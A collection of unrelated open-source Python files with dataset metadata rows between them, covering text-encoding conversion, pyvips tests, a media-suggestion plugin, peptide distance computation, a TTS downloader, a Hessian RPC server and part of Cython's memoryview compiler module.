dstfile = srcfile.replace(srcPath, dstPath, 1)
dstfiles.append(dstfile)
return srcfiles, dstfiles
def handleEncoding2Utf(original_file,newfile):
#newfile=original_file[0:original_file.rfind(.)]+'_copy.csv'
f=open(original_file,'rb+')
content=f.read()#读取文件内容,content为bytes类型,而非string类型
source_encoding='utf-8'
#####确定encoding类型
try:
content.decode('utf-8').encode('utf-8')
source_encoding='utf-8'
except:
try:
content.decode('gbk').encode('utf-8')
source_encoding='gbk'
except:
try:
content.decode('gb2312').encode('utf-8')
source_encoding='gb2312'
except:
try:
content.decode('gb18030').encode('utf-8')
source_encoding='gb18030'
except:
try:
content.decode('big5').encode('utf-8')
source_encoding='gb18030'
except:
content.decode('cp936').encode('utf-8')
source_encoding='cp936'
f.close()
#####按照确定的encoding读取文件内容,并另存为utf-8编码:
block_size=4096
#print(original_file, source_encoding)
dstDir = os.path.dirname(newfile)
if not os.path.exists(dstDir):
os.makedirs(dstDir)
with codecs.open(original_file,'r',source_encoding) as f:
with codecs.open(newfile,'w','utf-8') as f2:
while True:
content=f.read(block_size)
if not content:
break
f2.write(content)
_DictFileCoding[newfile] = source_encoding
def handleEncodingUtf2(original_file, newfile, coding = 'gbk'):
block_size=4096
source_encoding = 'utf-8'
#print(original_file, source_encoding)
dstDir = os.path.dirname(newfile)
if not os.path.exists(dstDir):
os.makedirs(dstDir)
with codecs.open(original_file,'r',source_encoding) as f:
with codecs.open(newfile,'w', coding) as f2:
while True:
content=f.read(block_size)
if not content:
break
f2.write(content)
def DelRowFile(srcPath, dstPath):
dir = os.path.dirname(dstPath)
if not os.path.exists(dir):
os.makedirs(dir)
with open(srcPath) as fp_in:
with open(dstPath, 'w') as fp_out:
#fp_out.writelines(line for i, line in enumerate(fp_in) if i != DELROW)
for line in fp_in.readlines():
print line
fp_out.write(line)
def DelColFile(srcPath):
#df = pd.read_csv(srcPath, encoding='utf-8')
df = pd.read_csv(srcPath,sep='\t',header=None, encoding='utf-8',)
df.drop([df.columns[DELCOL]], axis=1, inplace=True)
df.to_csv(srcPath, sep='\t',header=None, encoding='utf-8',index=None)
def main(argv):
#temp='TaskConfig'
#handleEncoding2Utf('Data/public/' + temp +'.txt', 'Dat/' + temp +'.txt')
#DelColFile('Dat/' + temp +'.txt')
#handleEncodingUtf2('Dat/' + temp +'.txt', 'Da/' + temp +'.txt')
#return
src = ""
dst = ""
if(len(argv) != 3):
#return
src = 'Data'
dst = 'Datas'
else:
src = argv[1]
dst = argv[2]
if not os.path.exists(src):
print u'Error! ----------------原始目录:%s 不存在' %(src)
return
print u'----------------原始目录 %s---------------' %(src)
print u'----------------目标目录 %s---------------' %(dst)
srcfiles, dstfiles = GetAllTxt(src, dst)
fLen = len(srcfiles)
for i in range(fLen):
src_file = srcfiles[i]
dst_file = dstfiles[i]
handleEncoding2Utf(src_file, dst_file)
DelColFile(dst_file)
handleEncodingUtf2(dst_file, src_file,_DictFileCoding[dst_file])
if('__main__' == __name__):
main(sys.argv)
|
mit
| 5,793,836,253,580,370,000
| 25.134752
| 74
| 0.652917
| false
| 2.578726
| false
| false
| false
|
kleisauke/pyvips
|
pyvips/tests/test_gvalue.py
|
1
|
3235
|
# vim: set fileencoding=utf-8 :
import unittest
import pyvips
from .helpers import PyvipsTester, JPEG_FILE
class TestGValue(PyvipsTester):
def test_bool(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gbool_type)
gv.set(True)
value = gv.get()
self.assertEqual(value, True)
gv.set(False)
value = gv.get()
self.assertEqual(value, False)
def test_int(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gint_type)
gv.set(12)
value = gv.get()
self.assertEqual(value, 12)
def test_double(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gdouble_type)
gv.set(3.1415)
value = gv.get()
self.assertEqual(value, 3.1415)
def test_enum(self):
# the Interpretation enum is created when the first image is made --
# make it ourselves in case we are run before the first image
pyvips.vips_lib.vips_interpretation_get_type()
interpretation_gtype = pyvips.gobject_lib. \
g_type_from_name(b'VipsInterpretation')
gv = pyvips.GValue()
gv.set_type(interpretation_gtype)
gv.set('xyz')
value = gv.get()
self.assertEqual(value, 'xyz')
def test_flags(self):
# the OperationFlags enum is created when the first op is made --
# make it ourselves in case we are run before that
pyvips.vips_lib.vips_operation_flags_get_type()
operationflags_gtype = pyvips.gobject_lib. \
g_type_from_name(b'VipsOperationFlags')
gv = pyvips.GValue()
gv.set_type(operationflags_gtype)
gv.set(12)
value = gv.get()
self.assertEqual(value, 12)
def test_string(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gstr_type)
gv.set('banana')
value = gv.get()
self.assertEqual(value, 'banana')
def test_array_int(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.array_int_type)
gv.set([1, 2, 3])
value = gv.get()
self.assertAlmostEqualObjects(value, [1, 2, 3])
def test_array_double(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.array_double_type)
gv.set([1.1, 2.1, 3.1])
value = gv.get()
self.assertAlmostEqualObjects(value, [1.1, 2.1, 3.1])
def test_image(self):
image = pyvips.Image.new_from_file(JPEG_FILE)
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.image_type)
gv.set(image)
value = gv.get()
self.assertEqual(value, image)
def test_array_image(self):
image = pyvips.Image.new_from_file(JPEG_FILE)
r, g, b = image.bandsplit()
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.array_image_type)
gv.set([r, g, b])
value = gv.get()
self.assertEqual(value, [r, g, b])
def test_blob(self):
with open(JPEG_FILE, 'rb') as f:
blob = f.read()
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.blob_type)
gv.set(blob)
value = gv.get()
self.assertEqual(value, blob)
if __name__ == '__main__':
unittest.main()
|
mit
| 4,357,290,625,036,344,300
| 29.233645
| 76
| 0.57898
| false
| 3.023364
| true
| false
| false
|
TNosredna/CouchPotatoServer
|
couchpotato/core/plugins/suggestion/main.py
|
1
|
3422
|
from couchpotato import get_session
from couchpotato.api import addApiView
from couchpotato.core.event import fireEvent
from couchpotato.core.helpers.encoding import ss
from couchpotato.core.helpers.variable import splitString, md5
from couchpotato.core.plugins.base import Plugin
from couchpotato.core.settings.model import Movie
from couchpotato.environment import Env
from sqlalchemy.sql.expression import or_
class Suggestion(Plugin):
def __init__(self):
addApiView('suggestion.view', self.suggestView)
addApiView('suggestion.ignore', self.ignoreView)
def suggestView(self, **kwargs):
movies = splitString(kwargs.get('movies', ''))
ignored = splitString(kwargs.get('ignored', ''))
limit = kwargs.get('limit', 6)
if not movies or len(movies) == 0:
db = get_session()
active_movies = db.query(Movie) \
.filter(or_(*[Movie.status.has(identifier = s) for s in ['active', 'done']])).all()
movies = [x.library.identifier for x in active_movies]
if not ignored or len(ignored) == 0:
ignored = splitString(Env.prop('suggest_ignore', default = ''))
cached_suggestion = self.getCache('suggestion_cached')
if cached_suggestion:
suggestions = cached_suggestion
else:
suggestions = fireEvent('movie.suggest', movies = movies, ignore = ignored, single = True)
self.setCache(md5(ss('suggestion_cached')), suggestions, timeout = 6048000) # Cache for 10 weeks
return {
'success': True,
'count': len(suggestions),
'suggestions': suggestions[:limit]
}
def ignoreView(self, imdb = None, limit = 6, remove_only = False, **kwargs):
ignored = splitString(Env.prop('suggest_ignore', default = ''))
if imdb:
if not remove_only:
ignored.append(imdb)
Env.prop('suggest_ignore', ','.join(set(ignored)))
new_suggestions = self.updateSuggestionCache(ignore_imdb = imdb, limit = limit, ignored = ignored)
return {
'result': True,
'ignore_count': len(ignored),
'suggestions': new_suggestions[limit - 1:limit]
}
def updateSuggestionCache(self, ignore_imdb = None, limit = 6, ignored = None):
# Combine with previous suggestion_cache
cached_suggestion = self.getCache('suggestion_cached')
new_suggestions = []
ignored = [] if not ignored else ignored
if ignore_imdb:
for cs in cached_suggestion:
if cs.get('imdb') != ignore_imdb:
new_suggestions.append(cs)
# Get new results and add them
if len(new_suggestions) - 1 < limit:
db = get_session()
active_movies = db.query(Movie) \
.filter(or_(*[Movie.status.has(identifier = s) for s in ['active', 'done']])).all()
movies = [x.library.identifier for x in active_movies]
ignored.extend([x.get('imdb') for x in cached_suggestion])
suggestions = fireEvent('movie.suggest', movies = movies, ignore = list(set(ignored)), single = True)
if suggestions:
new_suggestions.extend(suggestions)
self.setCache(md5(ss('suggestion_cached')), new_suggestions, timeout = 6048000)
return new_suggestions
|
gpl-3.0
| 2,790,638,608,713,622,000
| 36.604396
| 113
| 0.611631
| false
| 4.035377
| false
| false
| false
|
FRED-2/Fred2-Apps
|
src/Distance2SelfBinding.py
|
2
|
3775
|
# This code is part of the Fred2 distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
from tempfile import NamedTemporaryFile
__author__ = 'mohr,schubert'
import os
import subprocess
import logging
import itertools
import pandas
from Fred2.Core import Allele, AExternal
import DistanceMatrices
from DistanceMatrix import DistanceMatrix
class Distance2Self(object):
"""
Implements calulcation routine of distance to (self) peptides
Calculate k closest distances of peptide to peptide set represented as trie
All our matrices have the same ordering of letters.
If you use a new matrix, pleas make sure to use the same ordering! Otherwise the tries have to be recomputed!
"""
def __init__(self, _matrix, trie=None, saveTrieFile=False):
self.__saveTrieFile = saveTrieFile
self.__matrix = _matrix
self.__trie = trie
this_dir = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
self.__externalPathDistanceCalculator = os.path.join(this_dir, 'compute_distances_ivac')
self.__externalPathTrieGenerator = os.path.join(this_dir, 'get_TrieArray')
def __del__(self):
if not self.__saveTrieFile:
pass
def generate_trie(self, fastaFile, outfile='peptideTrie', peptideLength=9):
cmd = self.__externalPathTrieGenerator + " %s %s %s %s"
specifiedTrie = outfile
self.__trie = specifiedTrie
subprocess.check_output(cmd%(fastaFile, self.__matrix.path_to_matrix_file, peptideLength, specifiedTrie), shell=True)
def calculate_distances(self, peptides, pep_header="neopeptide", specifiedTrie="uniprot_proteome_l9", n=10):
def __load_trie(trieSource):
current = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
return os.path.join(current,"data","tries","{}.trie".format(trieSource))
# create temporary file with peptides for distance computation
tmpFile = NamedTemporaryFile(delete=False)
with open(tmpFile.name, "w") as peptidesFile:
for pep in peptides:
peptidesFile.write('%s\n' % pep)
cmd = self.__externalPathDistanceCalculator + " %s %s %s %s"
results = {}
trie = specifiedTrie if os.path.isfile(specifiedTrie) else __load_trie(specifiedTrie)
method = os.path.basename(specifiedTrie).split('.')[0] if os.path.isfile(specifiedTrie) else specifiedTrie
try:
re = self.parse_external_result(
subprocess.check_output(cmd % (self.__matrix.path_to_matrix_file, trie, tmpFile.name, n),shell=True))
for k, vs in re.iteritems():
results.setdefault(pep_header, []).append(k)
results.setdefault("trie", []).append(method)
for i,v in enumerate(vs):
if i > 0:
results.setdefault("distance_{i}".format(i=i),[]).append(float(v))
else:
results.setdefault("distance", []).append(float(v))
except:
logging.warning("Could not make distance calculation for trie {}".format(trie))
os.remove(tmpFile.name)
return pandas.DataFrame.from_dict(results)
def parse_external_result(self, result):
"""
:rtype : DataFrame
"""
parsedResult = {}
for line in result.strip().split('\n'):
splitted = line.strip().split(" ")[-1].split(";")
distanceValues = []
peptide = splitted[0].split(":")[0]
for s in splitted[:-1]:
distanceValues.append(float(s.split(",")[-1])/float(len(peptide)))
parsedResult[peptide] = distanceValues
return parsedResult
|
bsd-3-clause
| 6,947,356,897,559,048,000
| 36.009804
| 125
| 0.63894
| false
| 3.801611
| false
| false
| false
|
xe1gyq/nuupxe
|
core/GoogleTTS.py
|
1
|
5682
|
#!/usr/bin/python
import commands
import sys
import argparse
import re
import urllib, urllib2
import time
from collections import namedtuple
def split_text(input_text, max_length=100):
"""
Try to split between sentences to avoid interruptions mid-sentence.
Failing that, split between words.
See split_text_rec
"""
def split_text_rec(input_text, regexps, max_length=max_length):
"""
Split a string into substrings which are at most max_length.
Tries to make each substring as big as possible without exceeding
max_length.
Will use the first regexp in regexps to split the input into
substrings.
If it it impossible to make all the segments less or equal than
max_length with a regexp then the next regexp in regexps will be used
to split those into subsegments.
If there are still substrings who are too big after all regexps have
been used then the substrings, those will be split at max_length.
Args:
input_text: The text to split.
regexps: A list of regexps.
If you want the separator to be included in the substrings you
can add parenthesis around the regular expression to create a
group. Eg.: '[ab]' -> '([ab])'
Returns:
a list of strings of maximum max_length length.
"""
if(len(input_text) <= max_length): return [input_text]
#mistakenly passed a string instead of a list
if isinstance(regexps, basestring): regexps = [regexps]
regexp = regexps.pop(0) if regexps else '(.{%d})' % max_length
text_list = re.split(regexp, input_text)
combined_text = []
#first segment could be >max_length
combined_text.extend(split_text_rec(text_list.pop(0), regexps, max_length))
for val in text_list:
current = combined_text.pop()
concat = current + val
if(len(concat) <= max_length):
combined_text.append(concat)
else:
combined_text.append(current)
#val could be >max_length
combined_text.extend(split_text_rec(val, regexps, max_length))
return combined_text
return split_text_rec(input_text.replace('\n', ''),
['([\,|\.|;]+)', '( )'])
audio_args = namedtuple('audio_args',['language','output'])
def audio_extract(input_text='',args=None):
# This accepts :
# a dict,
# an audio_args named tuple
# or arg parse object
if args is None:
args = audio_args(language='en',output=open('output/output.mp3', 'w'))
if type(args) is dict:
args = audio_args(
language=args.get('language','en'),
output=open(args.get('output','output/output.mp3'), 'w')
)
#process input_text into chunks
#Google TTS only accepts up to (and including) 100 characters long texts.
#Split the text in segments of maximum 100 characters long.
combined_text = split_text(input_text)
#download chunks and write them to the output file
for idx, val in enumerate(combined_text):
mp3url = "http://translate.google.com/translate_tts?tl=%s&q=%s&total=%s&idx=%s" % (
args.language,
urllib.quote(val),
len(combined_text),
idx)
headers = {"Host": "translate.google.com",
"Referer": "http://www.gstatic.com/translate/sound_player2.swf",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) "
"AppleWebKit/535.19 (KHTML, like Gecko) "
"Chrome/18.0.1025.163 Safari/535.19"
}
req = urllib2.Request(mp3url, '', headers)
sys.stdout.write('.')
sys.stdout.flush()
if len(val) > 0:
try:
response = urllib2.urlopen(req)
args.output.write(response.read())
time.sleep(.5)
except urllib2.URLError as e:
print ('%s' % e)
args.output.close()
print('Saved MP3 to %s' % args.output.name)
def text_to_speech_mp3_argparse():
description = 'Google TTS Downloader.'
parser = argparse.ArgumentParser(description=description,
epilog='tunnel snakes rule')
parser.add_argument('-o', '--output',
action='store', nargs='?',
help='Filename to output audio to',
type=argparse.FileType('wb'), default='output/output.mp3')
parser.add_argument('-l', '--language',
action='store',
nargs='?',
help='Language to output text to.', default='en')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-f', '--file',
type=argparse.FileType('r'),
help='File to read text from.')
group.add_argument('-s', '--string',
action='store',
nargs='+',
help='A string of text to convert to speech.')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
print parser.parse_args()
return parser.parse_args()
if __name__ == "__main__":
args = text_to_speech_mp3_argparse()
if args.file:
input_text = args.file.read()
if args.string:
input_text = ' '.join(map(str, args.string))
audio_extract(input_text=input_text, args=args)
commands.getstatusoutput("mpg123 output/output.mp3")
|
apache-2.0
| 6,340,551,672,910,915,000
| 37.917808
| 91
| 0.567054
| false
| 4.078966
| false
| false
| false
|
c17r/TagTrain
|
src/tagtrain/tagtrain/tt_unblacklist.py
|
1
|
1281
|
from tagtrain import data
from tagtrain.tagtrain import TagTrainResponse, C_MEMBER, C_GROUP
class UnBlacklist(TagTrainResponse):
TYPE = TagTrainResponse.TYPE_COMMENTORMESSAGE
CMD_REGEX = f'unblacklist {C_MEMBER} {C_GROUP}?'
HELP_TEXT = ("`u/{botname} unblacklist <member-name> [<group-name>]` - "
"Allows previously blacklisted specified Member to add themselves, either for all "
"your Groups or just specified Group")
def run(self, reply, message, match):
self.LOGGER.debug('blacklist')
owner_name = message.author.name
member_name = match.group('member')
group_name = match.group('group')
try:
data.by_owner.unblacklist_user(owner_name, member_name, group_name)
except data.Group.DoesNotExist:
reply.append(f'Group `{group_name}` does not exist. Skipping.')
return
except data.Blacklist.DoesNotExist:
t = f'Group `{group_name}`' if group_name else 'Blanket'
reply.append(t + f' Blacklist for Member `{member_name}` does not exist. Skipping.')
return
t = f'Group `{group_name}`' if group_name else 'Blanket'
reply.append(t + f' Blacklist for Member `{member_name}` removed.')
|
mit
| 5,373,507,038,095,940,000
| 40.322581
| 100
| 0.63388
| false
| 3.823881
| false
| false
| false
|
anetasie/sherpa
|
sherpa/astro/datastack/plot_backend/plot_matplotlib.py
|
4
|
2185
|
#
# Copyright (C) 2010, 2014, 2015 Smithsonian Astrophysical Observatory
#
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
Plotting routines for the data stack module provided by matplotlib.
"""
import matplotlib.pyplot as plt
name = "pylab_backend"
def initialize_backend():
"""Ensure that the plotting backend is initialized.
"""
pass
def initialize_plot(dataset, ids):
"""Create the plot window or figure for the given dataset.
Parameters
----------
dataset : str or int
The dataset.
ids : array_like
The identifier array from the DataStack object.
See Also
--------
select_plot
"""
plt.figure(ids.index(dataset['id']) + 1)
def select_plot(dataset, ids):
"""Select the plot window or figure for the given dataset.
The plot for this dataset is assumed to have been created.
Parameters
----------
dataset : str or int
The dataset.
ids : array_like
The identifier array from the DataStack object.
See Also
--------
initialize_plot
"""
plt.figure(ids.index(dataset['id']) + 1)
def save_plot(*args, **kwargs):
"""Save the current plot."""
plt.savefig(*args, **kwargs)
# How is this different from the _print_window/savefig methods
# of the DataStack class?
plot_savefig = plt.savefig
plot_xlabel = plt.xlabel
plot_ylabel = plt.ylabel
plot_title = plt.title
plot_xlim = plt.xlim
plot_ylim = plt.ylim
plot_set_xscale = plt.xscale
plot_set_yscale = plt.yscale
|
gpl-3.0
| 2,775,161,598,395,627,500
| 23.829545
| 74
| 0.684668
| false
| 3.901786
| false
| false
| false
|
PetrGlad/hessianpy
|
hessian/server.py
|
1
|
3978
|
#
# Hessian protocol implementation
# This file contains simple RPC server code.
#
# Protocol specification can be found here:
# http://www.caucho.com/resin-3.0/protocols/hessian-1.0-spec.xtp
#
# Copyright 2006-2007 Petr Gladkikh (batyi at users sourceforge net)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import hessian
from StringIO import StringIO
import traceback
import socket
__revision__ = "$Rev$"
class HessianHTTPRequestHandler(BaseHTTPRequestHandler):
"""Subclasses should create clss's member message_map which maps method
names into function objects """
MAX_CHUNK_SIZE = 2 ^ 12
def do_POST(self):
try:
ctx = hessian.ParseContext(self.rfile)
(method, headers, params) = hessian.Call().read(ctx, ctx.read(1))
except Exception as e:
self.send_error(500, "Can not parse call request. Error: " + str(e))
return
if not self.message_map.has_key(method):
self.send_error(500, "Method '" + method + "' is not found")
return
succeeded = True
try:
result = self.message_map[method](*([self] + params))
except Exception as e:
stackTrace = traceback.format_exc()
succeeded = False
result = {"stackTrace" : stackTrace, "args" : e.args}
result.update(e.__dict__)
try:
sio = StringIO()
hessian.Reply().write(
hessian.WriteContext(sio),
(headers, succeeded, result))
reply = sio.getvalue()
except Exception:
stackTrace = traceback.format_exc()
# todo write this to logs
self.send_error(500, "Can not send response for '" + method + "'\n" + stackTrace)
return
self.send_response(200, "OK")
self.send_header("Content-type", "application/octet-stream")
self.send_header("Content-Length", str(len(reply)))
self.end_headers()
self.wfile.write(reply)
class ServerStoppedError(Exception):
pass
class StoppableHTTPServer(HTTPServer):
"""
Code adapted from Python CookBook
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/425210
"""
def server_bind(self):
HTTPServer.server_bind(self)
self.run = True
def get_request(self):
while self.run:
return self.socket.accept()
raise ServerStoppedError()
def stop(self):
self.run = False
def serve(self):
try:
while self.run:
self.handle_request()
except ServerStoppedError:
return
# ---------------------------------------------------------
# Server usage example
def hello():
return "Hello, from HessianPy!"
class TestHandler(HessianHTTPRequestHandler):
message_map = {"hello" : hello}
if __name__ == "__main__":
# Example code
print "Starting test server"
server_address = ('localhost', 9001)
httpd = StoppableHTTPServer(server_address, TestHandler)
print "Serving from ", server_address
httpd.serve()
import time
time.sleep(200)
httpd.stop()
print "Stopping test server"
|
apache-2.0
| 235,882,162,371,547,040
| 29.6
| 93
| 0.590749
| false
| 4.245464
| false
| false
| false
|
rguillebert/CythonCTypesBackend
|
Cython/Compiler/MemoryView.py
|
1
|
33248
|
from Errors import CompileError, error
import ExprNodes
from ExprNodes import IntNode, NameNode, AttributeNode
import Options
from Code import UtilityCode, TempitaUtilityCode
from UtilityCode import CythonUtilityCode
import Buffer
import PyrexTypes
import ModuleNode
START_ERR = "Start must not be given."
STOP_ERR = "Axis specification only allowed in the 'step' slot."
STEP_ERR = "Step must be omitted, 1, or a valid specifier."
BOTH_CF_ERR = "Cannot specify an array that is both C and Fortran contiguous."
INVALID_ERR = "Invalid axis specification."
NOT_CIMPORTED_ERR = "Variable was not cimported from cython.view"
EXPR_ERR = "no expressions allowed in axis spec, only names and literals."
CF_ERR = "Invalid axis specification for a C/Fortran contiguous array."
ERR_UNINITIALIZED = ("Cannot check if memoryview %s is initialized without the "
"GIL, consider using initializedcheck(False)")
def err_if_nogil_initialized_check(pos, env, name='variable'):
"This raises an exception at runtime now"
pass
#if env.nogil and env.directives['initializedcheck']:
#error(pos, ERR_UNINITIALIZED % name)
def concat_flags(*flags):
return "(%s)" % "|".join(flags)
format_flag = "PyBUF_FORMAT"
memview_c_contiguous = "(PyBUF_C_CONTIGUOUS | PyBUF_FORMAT | PyBUF_WRITABLE)"
memview_f_contiguous = "(PyBUF_F_CONTIGUOUS | PyBUF_FORMAT | PyBUF_WRITABLE)"
memview_any_contiguous = "(PyBUF_ANY_CONTIGUOUS | PyBUF_FORMAT | PyBUF_WRITABLE)"
memview_full_access = "PyBUF_FULL"
#memview_strided_access = "PyBUF_STRIDED"
memview_strided_access = "PyBUF_RECORDS"
MEMVIEW_DIRECT = '__Pyx_MEMVIEW_DIRECT'
MEMVIEW_PTR = '__Pyx_MEMVIEW_PTR'
MEMVIEW_FULL = '__Pyx_MEMVIEW_FULL'
MEMVIEW_CONTIG = '__Pyx_MEMVIEW_CONTIG'
MEMVIEW_STRIDED= '__Pyx_MEMVIEW_STRIDED'
MEMVIEW_FOLLOW = '__Pyx_MEMVIEW_FOLLOW'
_spec_to_const = {
'direct' : MEMVIEW_DIRECT,
'ptr' : MEMVIEW_PTR,
'full' : MEMVIEW_FULL,
'contig' : MEMVIEW_CONTIG,
'strided': MEMVIEW_STRIDED,
'follow' : MEMVIEW_FOLLOW,
}
_spec_to_abbrev = {
'direct' : 'd',
'ptr' : 'p',
'full' : 'f',
'contig' : 'c',
'strided' : 's',
'follow' : '_',
}
memslice_entry_init = "{ 0, 0, { 0 }, { 0 }, { 0 } }"
memview_name = u'memoryview'
memview_typeptr_cname = '__pyx_memoryview_type'
memview_objstruct_cname = '__pyx_memoryview_obj'
memviewslice_cname = u'__Pyx_memviewslice'
def put_init_entry(mv_cname, code):
code.putln("%s.data = NULL;" % mv_cname)
code.putln("%s.memview = NULL;" % mv_cname)
def mangle_dtype_name(dtype):
# a dumb wrapper for now; move Buffer.mangle_dtype_name in here later?
import Buffer
return Buffer.mangle_dtype_name(dtype)
#def axes_to_str(axes):
# return "".join([access[0].upper()+packing[0] for (access, packing) in axes])
def put_acquire_memoryviewslice(lhs_cname, lhs_type, lhs_pos, rhs, code,
have_gil=False, first_assignment=True):
"We can avoid decreffing the lhs if we know it is the first assignment"
assert rhs.type.is_memoryviewslice
pretty_rhs = isinstance(rhs, NameNode) or rhs.result_in_temp()
if pretty_rhs:
rhstmp = rhs.result()
else:
rhstmp = code.funcstate.allocate_temp(lhs_type, manage_ref=False)
code.putln("%s = %s;" % (rhstmp, rhs.result_as(lhs_type)))
# Allow uninitialized assignment
#code.putln(code.put_error_if_unbound(lhs_pos, rhs.entry))
put_assign_to_memviewslice(lhs_cname, rhs, rhstmp, lhs_type, code,
have_gil=have_gil, first_assignment=first_assignment)
if not pretty_rhs:
code.funcstate.release_temp(rhstmp)
def put_assign_to_memviewslice(lhs_cname, rhs, rhs_cname, memviewslicetype, code,
have_gil=False, first_assignment=False):
if not first_assignment:
code.put_xdecref_memoryviewslice(lhs_cname, have_gil=have_gil)
if rhs.is_name:
code.put_incref_memoryviewslice(rhs_cname, have_gil=have_gil)
code.putln("%s = %s;" % (lhs_cname, rhs_cname))
#code.putln("%s.memview = %s.memview;" % (lhs_cname, rhs_cname))
#code.putln("%s.data = %s.data;" % (lhs_cname, rhs_cname))
#for i in range(memviewslicetype.ndim):
# tup = (lhs_cname, i, rhs_cname, i)
# code.putln("%s.shape[%d] = %s.shape[%d];" % tup)
# code.putln("%s.strides[%d] = %s.strides[%d];" % tup)
# code.putln("%s.suboffsets[%d] = %s.suboffsets[%d];" % tup)
def get_buf_flags(specs):
is_c_contig, is_f_contig = is_cf_contig(specs)
if is_c_contig:
return memview_c_contiguous
elif is_f_contig:
return memview_f_contiguous
access, packing = zip(*specs)
if 'full' in access or 'ptr' in access:
return memview_full_access
else:
return memview_strided_access
def insert_newaxes(memoryviewtype, n):
axes = [('direct', 'strided')] * n
axes.extend(memoryviewtype.axes)
return PyrexTypes.MemoryViewSliceType(memoryviewtype.dtype, axes)
def broadcast_types(src, dst):
n = abs(src.ndim - dst.ndim)
if src.ndim < dst.ndim:
return insert_newaxes(src, n), dst
else:
return src, insert_newaxes(dst, n)
def src_conforms_to_dst(src, dst, broadcast=False):
'''
returns True if src conforms to dst, False otherwise.
If conformable, the types are the same, the ndims are equal, and each axis spec is conformable.
Any packing/access spec is conformable to itself.
'direct' and 'ptr' are conformable to 'full'.
'contig' and 'follow' are conformable to 'strided'.
Any other combo is not conformable.
'''
if src.dtype != dst.dtype:
return False
if src.ndim != dst.ndim:
if broadcast:
src, dst = broadcast_types(src, dst)
else:
return False
for src_spec, dst_spec in zip(src.axes, dst.axes):
src_access, src_packing = src_spec
dst_access, dst_packing = dst_spec
if src_access != dst_access and dst_access != 'full':
return False
if src_packing != dst_packing and dst_packing != 'strided':
return False
return True
def valid_memslice_dtype(dtype, i=0):
"""
Return whether type dtype can be used as the base type of a
memoryview slice.
We support structs, numeric types and objects
"""
if dtype.is_complex and dtype.real_type.is_int:
return False
if dtype.is_struct and dtype.kind == 'struct':
for member in dtype.scope.var_entries:
if not valid_memslice_dtype(member.type):
return False
return True
return (
dtype.is_error or
# Pointers are not valid (yet)
# (dtype.is_ptr and valid_memslice_dtype(dtype.base_type)) or
(dtype.is_array and i < 8 and
valid_memslice_dtype(dtype.base_type, i + 1)) or
dtype.is_numeric or
dtype.is_pyobject or
dtype.is_fused or # accept this as it will be replaced by specializations later
(dtype.is_typedef and valid_memslice_dtype(dtype.typedef_base_type))
)
def validate_memslice_dtype(pos, dtype):
if not valid_memslice_dtype(dtype):
error(pos, "Invalid base type for memoryview slice: %s" % dtype)
class MemoryViewSliceBufferEntry(Buffer.BufferEntry):
def __init__(self, entry):
self.entry = entry
self.type = entry.type
self.cname = entry.cname
self.buf_ptr = "%s.data" % self.cname
dtype = self.entry.type.dtype
dtype = PyrexTypes.CPtrType(dtype)
self.buf_ptr_type = dtype
def get_buf_suboffsetvars(self):
return self._for_all_ndim("%s.suboffsets[%d]")
def get_buf_stridevars(self):
return self._for_all_ndim("%s.strides[%d]")
def get_buf_shapevars(self):
return self._for_all_ndim("%s.shape[%d]")
def generate_buffer_lookup_code(self, code, index_cnames):
axes = [(dim, index_cnames[dim], access, packing)
for dim, (access, packing) in enumerate(self.type.axes)]
return self._generate_buffer_lookup_code(code, axes)
def _generate_buffer_lookup_code(self, code, axes, cast_result=True):
bufp = self.buf_ptr
type_decl = self.type.dtype.declaration_code("")
for dim, index, access, packing in axes:
shape = "%s.shape[%d]" % (self.cname, dim)
stride = "%s.strides[%d]" % (self.cname, dim)
suboffset = "%s.suboffsets[%d]" % (self.cname, dim)
flag = get_memoryview_flag(access, packing)
if flag in ("generic", "generic_contiguous"):
# Note: we cannot do cast tricks to avoid stride multiplication
# for generic_contiguous, as we may have to do (dtype *)
# or (dtype **) arithmetic, we won't know which unless
# we check suboffsets
code.globalstate.use_utility_code(memviewslice_index_helpers)
bufp = ('__pyx_memviewslice_index_full(%s, %s, %s, %s)' %
(bufp, index, stride, suboffset))
elif flag == "indirect":
bufp = "(%s + %s * %s)" % (bufp, index, stride)
bufp = ("(*((char **) %s) + %s)" % (bufp, suboffset))
elif flag == "indirect_contiguous":
# Note: we do char ** arithmetic
bufp = "(*((char **) %s + %s) + %s)" % (bufp, index, suboffset)
elif flag == "strided":
bufp = "(%s + %s * %s)" % (bufp, index, stride)
else:
assert flag == 'contiguous', flag
bufp = '((char *) (((%s *) %s) + %s))' % (type_decl, bufp, index)
bufp = '( /* dim=%d */ %s )' % (dim, bufp)
if cast_result:
return "((%s *) %s)" % (type_decl, bufp)
return bufp
def generate_buffer_slice_code(self, code, indices, dst, have_gil,
have_slices):
"""
